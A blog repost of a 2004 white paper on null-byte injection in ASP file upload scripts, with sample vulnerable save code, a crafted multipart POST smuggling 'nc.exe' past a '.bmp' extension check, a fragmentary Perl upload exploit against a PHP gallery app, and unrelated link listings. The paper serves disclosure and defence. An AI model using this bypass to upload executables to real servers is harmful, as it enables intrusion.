0x00 vs ASP file upload scripts

原创 2004年07月21日 21:34:00

Copyright Security-Assessment.com Ltd 2004
White Paper
Title: 0x00 vs ASP file upload scripts
Prepared by: Brett Moore
Network Intrusion Specialist
Date: 13 July 2004
13/07/2004 Page 2 of 7
Copyright Security-Assessment.com Ltd 2004
The affects of the `Poison NULL byte` have not been widely explored in ASP, but
as with other languages the NULL byte can cause problems when ASP passes
data to objects.
Many upload systems written in ASP suffer from a common problem whereby a
NULL byte can be inserted into the filename parameter leading to any extension,
after the null byte, being ignored when writing the file.
This means that in some cases it is possible to bypass checks for valid
extensions, even if one is appended by the application.
This is very similar to attacks against perl and PHP, the difference being how the
null byte is sent to the application.
This problem arises when data is compared and validated in ASP script but
passed to the FileSystemObject without checking for NULL bytes.
This document will discuss how ASP upload scripts can be affected by the Poison
NULL byte attack.
The information in this document is based on research done using upload
systems that incorporate multipart/form-data posts and the
Scripting.FileSystemObject object.
Throughout this document we focus on the CreateTextFile method, which is used
to create a file for writing, but it is possible that other objects functions are
vulnerable to the same type of problem.
A %00 or NULL can not be sent through the URL or a normal form post as the
web server registers this as the end of the string, but does not store it in the
filename variable.
When a filename is sent using a multipart/form-data post the null byte will be
included in the filename variable, thus affecting calls to the FileSystemObject.
File Uploading
File uploading is commonly done using an input object of type file and an
encoding type of multipart/form-data.
The content type "application/x-www-form-urlencoded" is inefficient for sending
large quantities of binary data or text containing non-ASCII characters. The
13/07/2004 Page 3 of 7
Copyright Security-Assessment.com Ltd 2004
content type "multipart/form-data" should be used for submitting forms that
contain files, non-ASCII data, and binary data.
A "multipart/form-data" message contains a series of parts, each representing a
successful control. The parts are sent to the processing agent in the same order
the corresponding controls appear in the document stream.

Your Picture:

When submitted the forms data will be sent in the multipart/form-data format. This
allows for the transfer of all bytes, including nulls, within the forms posted data.
Upon receiving the post, the target ASP page needs to process and decode the
posted data into a useable state.

File Saving
At some point in the uploading process, the file will be saved to a file location. The
following is some commonly used code to do this.
Public Sub Save(filename)
Dim objFSO, objFSOFile
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
Set objFSOFile = objFSO.CreateTextFile(path + "/" + filename)
End Sub
When the filename parameter is passed to the CreateTextFile() function, it may
contain NULL bytes. This can affect the name of the created file as the
CreateTextFile only reads up to the NULL byte when creating the file.
Set objFSOFile = objFSO.CreateTextFile(path + "/" + filename)
If filename contains a NULL byte, anything after that byte will be ignored.

Null Byte
The NULL byte can be inserted manually through modifications to the multipart
post data using a hex editor, or by using a web proxy.
Multipart Form Post
POST /upload.asp HTTP/1.0
Content-Type: multipart/form-data; boundary=---------------------------
Host: localhost
Content-Length: 359
Pragma: no-cache
Content-Disposition: form-data; name="YourFile"; filename="c:/nc.exe .bmp"
Content-Type: text/plain
Proof Of Upload Test File
Content-Disposition: form-data; name="submit"
The filename parameter of the above post has been changed as such;
N C . E X E (null) . B M P
4E 43 2E 45 58 45 00 2E 42 4D 50
Note that an actual NULL byte (0x00) has been inserted between the .exe and the

Script Tests
The following two file save scripts shown below are examples of upload scripts
where the extension of the written file can be arbitrarily set.
In both cases tFile is the filename parameter passed through the post.

Example One ( File Extension Appending )
Public Sub Save(Path)
Dim objFSO, objFSOFile
Dim lngLoop
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
Set objFSOFile =
objFSO.CreateTextFile(objFSO.BuildPath(Path, tFile + ".bmp"))
‘ Write the file contents
For lngLoop = 1 to LenB(m_Blob)
objFSOFile.Write Chr(AscB(MidB(m_Blob, lngLoop, 1)))
End Sub
Example Two ( File Extension Checking )
Public Sub Save(Path)
Dim objFSO, objFSOFile
Dim lngLoop
‘ Check the file extension
if right(tFile,4) <> “.bmp” then exit sub
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
Set objFSOFile=
objFSO.CreateTextFile(objFSO.BuildPath(Path, tFile))
‘ Write the file contents
For lngLoop = 1 to LenB(m_Blob)
objFSOFile.Write Chr(AscB(MidB(m_Blob, lngLoop, 1)))
End Sub
13/07/2004 Page 6 of 7
Copyright Security-Assessment.com Ltd 2004
Final Summary
It has commonly been thought that web applications written in ASP are safe from
the problems associated with NULL bytes. While in most instances this is true, it
can be seen here that applications that make use of objects external to the native
ASP scripting language, can be affected by NULL bytes.
It is probable that other objects and areas can also be manipulated to some extent
when their data is collected through a multipart/form-data post.
As in other areas, proper validation of user input is paramount to the security of
web applications. It is therefore important to check input not only for common
attack strings used for folder traversal, but also for NULL bytes before using the
input in the creation of files.

Perl CGI problems - rain.forest.puppy
Bugtraq Post Regarding PHP and null bytes
Forms in HTML documents


测试程序:NEATPIC PHP目录直读版 1.2.3


$| = 1;
use Socket;
$host = "";
$port = "80";

$UploadTo = "";
$str =
"Content-Disposition: form-data; name=/"path/"/r/n".
"Content-Disposition: form-data; name=/"image/"; filename=/"F://tools//1.gif/"/r/n".
"Content-Type: text/plain/r/n".

print $str;
print $len;

$req ="POST /1/1/3721/index.php?action=upload HTTP/1.1/r/n".
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, */*/r/n".
"Accept-Language: zh-cn/r/n".
"Content-Type: multipart/form-data; boundary=---------------------------7d41f4a600472/r/n".
"Accept-Encoding: gzip, deflate/r/n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Hotbar; .NET CLR 1.1.4322)/r/n".
"Content-Length: $len/r/n".
"Connection: Keep-Alive/r/n".
"Cache-Control: no-cache/r/n".
"Cookie: PHPSESSID=111111111111111111111111/r/n".
print $req;
@res = sendraw($req);
print @res;

#Hmm...Maybe you can send it by other way

sub sendraw {
    my ($req) = @_;
    my $target;
    $target = inet_aton($host) || die("inet_aton problems/n");
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems/n");
    if(connect(S,pack "SnA4x8",2,$port,$target)){
    $| = 1;
        print $req;
    my @res = <S>;
        return @res;
    else {
    die("Can't connect.../n");


FileUpload控件FileUpload Control应用程序中经常需要允许用户把文件上传到web服务器。尽管在ASP.NET 1.X也可以完成该功能,但在ASP.NET 2.0中使用FileU...
  • yandong19861103
  • yandong19861103
  • 2008-08-25 16:29:00
  • 6890

MVC Upload 代码

  • 2016年05月27日 14:01
  • 4.78MB
  • 下载

jquery 多图片上传预览

  • 2013年05月02日 21:54
  • 90KB
  • 下载


  • 2015年10月19日 11:52
  • 9KB
  • 下载

Description of ASP file upload and ScriptUtilities

  • 2014年04月02日 00:31
  • 1.58MB
  • 下载


Script file 'f:\ProgramData\Anaconda3\Scripts\pip-script.py' is not present.只需用easy_install pip再装一次p...
  • bxm_555
  • bxm_555
  • 2018-03-28 01:10:35
  • 61

jquery file upload示例

jquery file uplaod示例
  • qq_37936542
  • qq_37936542
  • 2018-02-05 13:50:42
  • 588

JQuery Upload File插件上传文件提示 Empty file upload result

  • ldrmcml
  • ldrmcml
  • 2014-08-11 15:43:08
  • 2408

golang实战使用gin+xorm搭建go语言web框架restgo详解5.4 控制器参数绑定

controller绑定参数常用如下方法1、 获取path中的参数// this one will match /user/john/ and also /user/john/send// If no...
  • keytounix
  • keytounix
  • 2018-02-19 10:29:55
  • 184

执行 pip install dicom 出现 Cannot open D:\Program Files\Anaconda3\Scripts\pip-script.py 错误解决办法

今天在安装pydicom 时出现 Cannot open D:\Program Files\Anaconda3\Scripts\pip-script.py问题,在网上搜索答案,也没找到,于是我就想更...
  • u011509971
  • u011509971
  • 2017-07-25 17:35:02
  • 4093
您举报文章:0x00 vs ASP file upload scripts